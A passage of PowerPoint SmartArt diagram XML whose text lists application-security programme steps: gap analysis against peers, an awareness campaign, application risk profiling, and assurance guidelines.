          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Conduct </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>your peers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>define </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>key </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>improvement areas and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>an execution </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>plan. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" type="parTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}" type="sibTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29D76988-94EC-456A-9326-82A5AA778D9E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Gain </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>management approval and establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>application security awareness </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>campaign</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> for the entire IT </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>organization.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" type="parTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41E4CEE4-E668-414D-904A-3A62818B4066}" type="sibTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{168F1251-0689-442A-B8FC-0A781112776D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Create an application risk profiling model to measure and prioritize all your applications and APIs. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48643092-65B8-42CE-8E35-AA9211C4F6F6}" type="parTrans" cxnId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A16CAF8-C7C7-4B9C-A977-34CB2964E0E1}" type="sibTrans" cxnId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{070C93F6-752D-4DBB-9D29-5B772454B72B}" type="parTrans" cxnId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7732DA14-DAD9-46E0-81D8-10D0187DA04D}" type="sibTrans" cxnId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" type="pres">
      <dgm:prSet presAssocID="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5" custScaleX="29073">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" type="pres">
      <dgm:prSet presAssocID="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" type="pres">
      <dgm:prSet presAssocID="{D22B1E2D-9241-472F-8A9E-565E70887137}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" type="pres">
      <dgm:prSet presAssocID="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{23A55926-6632-4C49-BE69-326A87E18CBC}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{26ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="1" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{4D4901AE-986B-4432-9DC1-4E0F95A75C0C}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{85EDB1E7-A378-4F0C-B0F9-C3AC2705555F}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{86012D62-A2D0-4619-82DE-82E2DAD81915}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EDF5A9CC-CC5C-44FB-AD2F-4A9588D299B6}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" srcOrd="0" destOrd="0" parTransId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" sibTransId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}"/>
    <dgm:cxn modelId="{037BDB8F-830F-44B2-9861-7E6A03948B87}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" srcOrd="1" destOrd="0" parTransId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" sibTransId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}"/>
    <dgm:cxn modelId="{3F49345C-EBC1-44D8-BC11-279CA7A6862B}" type="presOf" srcId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{43FBE940-8BFA-4EF5-A55D-083FACE306D9}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{168F1251-0689-442A-B8FC-0A781112776D}" srcOrd="1" destOrd="0" parTransId="{48643092-65B8-42CE-8E35-AA9211C4F6F6}" sibTransId="{2A16CAF8-C7C7-4B9C-A977-34CB2964E0E1}"/>
    <dgm:cxn modelId="{D95EFEA5-B61A-4A2C-8A7A-18669C2814B8}" type="presOf" srcId="{168F1251-0689-442A-B8FC-0A781112776D}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9B1E24C1-9646-4B11-BED2-E864AE96290B}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{572A4DD0-8BB0-43D8-A35E-9D4C730E38BD}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{9CB74495-237D-4F40-98F9-915162C6F1AD}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" srcOrd="1" destOrd="0" parTransId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" sibTransId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{7CE23833-C39B-44CF-88AA-5E5F3CB77A73}" type="presOf" srcId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" srcOrd="0" destOrd="0" parTransId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" sibTransId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}"/>
    <dgm:cxn modelId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" srcOrd="4" destOrd="0" parTransId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" sibTransId="{A003834B-8490-4CC6-B531-19539D19FBD4}"/>
    <dgm:cxn modelId="{F5234BFB-0653-49D4-A393-2589918EFE10}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{1FC62C5B-88D3-46E0-A53E-57D4877596DC}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4FF662A7-AB28-429F-864C-7ABE5405F113}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73DAC175-225C-4995-9056-E10EE015E040}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" srcOrd="1" destOrd="0" parTransId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" sibTransId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}"/>
    <dgm:cxn modelId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" srcOrd="0" destOrd="0" parTransId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" sibTransId="{1EBA831D-0061-461C-A1EF-795466184E12}"/>
    <dgm:cxn modelId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}" srcOrd="2" destOrd="0" parTransId="{070C93F6-752D-4DBB-9D29-5B772454B72B}" sibTransId="{7732DA14-DAD9-46E0-81D8-10D0187DA04D}"/>
    <dgm:cxn modelId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{29D76988-94EC-456A-9326-82A5AA778D9E}" srcOrd="2" destOrd="0" parTransId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" sibTransId="{41E4CEE4-E668-414D-904A-3A62818B4066}"/>
    <dgm:cxn modelId="{F5AF1F6E-9C66-4796-998A-0AAADCF54EA0}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
